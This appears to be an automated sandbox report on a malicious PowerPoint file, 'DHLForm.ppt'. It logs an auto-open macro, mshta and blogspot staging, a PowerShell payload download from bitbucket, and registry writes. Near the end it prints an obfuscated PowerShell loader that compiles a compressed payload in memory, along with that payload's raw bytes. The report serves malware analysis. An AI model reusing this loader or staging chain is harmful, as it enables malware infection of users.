Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:Hmt6ODuT1T9rHnbQAYn_Kn4-RIPtxg:emLdUalzCJuXb2hK
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:bo4Rzlac7OC6SQzizPuNFmoxcxmpHg:LWMGlJqI2wYq8ec8
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:L3viVeTwYcxGvOqhkZuspYUloSz1Cg:OYEqVJkk_9TWQB1Z
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: "background-position:0 -483px"></span><span class="gb_s">Maps</span></a></li><li class="gb_j gb_k" aria-grabbed="false"><a class="gb_e" data-pid="36" draggable="false" href="https://www.youtube.com/?g equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: /s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-openso equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: /s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-openso.goo equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.559632238.000001BEE8B06000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp String found in binary or memory: Content-Security-Policy: script-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: Content-Security-Policyscript-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp String found in binary or memory: Content-Security-Policyscript-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport} equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: Sensitive content warning b_s">Maps</span></a></li><li class="gb_j gb_k" aria-grabbed="false"><a class="gb_e" data-pid="36" draggable="false" href="https://www.youtube.com/?g equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: b_s">Maps</span></a></li><li class="gb_j gb_k" aria-grabbed="false"><a class="gb_e" data-pid="36" draggable="false" href="https://www.youtube.com/?g equals www.youtube.com (Youtube)
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com www-onepick-op equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/?gl=GB&tab=j1 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: pspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleu equals www.youtube.com (Youtube)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global mouse hook
Source: C:\Windows\SysWOW64\mshta.exe Windows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dll

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\mshta.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\mshta.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\mshta.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\mshta.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_00007FFAEB5B671C 22_2_00007FFAEB5B671C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_00007FFAEB685F95 22_2_00007FFAEB685F95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_00007FFAEB686D6C 22_2_00007FFAEB686D6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FB4730 40_2_02FB4730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FB4790 40_2_02FB4790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FB4770 40_2_02FB4770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FBD661 40_2_02FBD661
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: DHLForm.ppt OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Yara signature match
Source: amsi32_5220.amsi.csv, type: OTHER Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: amsi64_6404.amsi.csv, type: OTHER Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.308761987.00000000067B7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.278320998.0000000006859000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.334835674.00000000067BB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.285035686.00000000067B7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.271994315.00000000067DE000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.285799185.00000000067B7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: Process Memory Space: mshta.exe PID: 6448, type: MEMORYSTR Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: Process Memory Space: mshta.exe PID: 6448, type: MEMORYSTR Matched rule: webshell_in_image date = 2021/02/27, author = Arnim Rupp, description = Webshell in GIF, PNG or JPG, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = , hash = d4fde4e691db3e70a6320e78657480e563a9f87935af873a99db72d6a9a83c78
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: DHLForm.ppt OLE, VBA macro line: Sub auto_open()
PE file does not import any functions
Source: lmts0v03.dll.30.dr Static PE information: No import functions for PE file found
Source: a0uccovc.dll.31.dr Static PE information: No import functions for PE file found
Document contains embedded VBA macros
Source: DHLForm.ppt OLE indicator, VBA macros: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: classification engine Classification label: mal100.troj.expl.evad.winPPT@50/134@38/9
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close()$input.Close()[byte[]] $byteOutArray = $output.ToArray() return $byteOutArray }}function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")$v4 = "v4.0"$dictionary.Add($hello, $v4)$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters$v1 = "Sys@@@".Replace("@@@","tem.dll")$CompilerParametres.ReferencedAssemblies.Add($v1)$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")$CompilerParametres.IncludeDebugInformation = $false$CompilerParametres.GenerateExecutable = $false$CompilerParametres.GenerateInMemory = $true$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"$BB = Decompress($BB)[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)[Byte[]] $Bytes = 
Decompress(@(31,139,8,0,0,0,0,0,4,0,204,189,7,152,28,197,177,56,62,59,187,59,105,195,93,239,238,205,198,187,89,229,209,237,41,156,68,184,147,64,58,162,201,201,128,201,18,57,24,88,224,4,6,4,135,176,113,68,8,129,19,62,11,140,101,27,219,56,27,108,225,140,35,78,216,56,201,182,140,206,56,231,108,63,63,219,32,253,43,116,79,216,93,33,222,179,223,239,251,235,211,205,118,87,117,247,244,116,87,87,87,87,87,87,31,123,198,102,45,169,105,90,10,254,118,239,214,180,71,52,254,55,161,237,253,223,6,248,203,123,31,205,107,15,219,143,207,122,36,113,204,227,179,78,190,228,210,201,230,85,215,180,47,190,230,220,43,154,231,159,123,229,149,237,117,205,243,46,108,94,115,237,149,205,75,175,108,30,122,252,243,155,87,180,47,184,112,113,46,231,204,149,101,156,112,152,166,29,147,72,106,63,127,106,226,92,85,238,83,154,158,200,36,44,77,59,13,106,102,48,108,215,117,16,110,170,20,19,28,214,185,222,154,22,254,106,143,38,9,174,17,122,226,165,154,214,79,255,195,223,224,135,254,189,21,202,125,1,125,12,228,75,246,248,200,251,147,90,246,57,180,69,215,63,168,159,21,137,90,16,63,34,18,95,188,238,194,235,215,97,189,95,32,191,235,180,176,222,145,34,214,46,190,102,242,154,243,49,146,148,117,196,15,61,35,94,209,9,248,191,248,154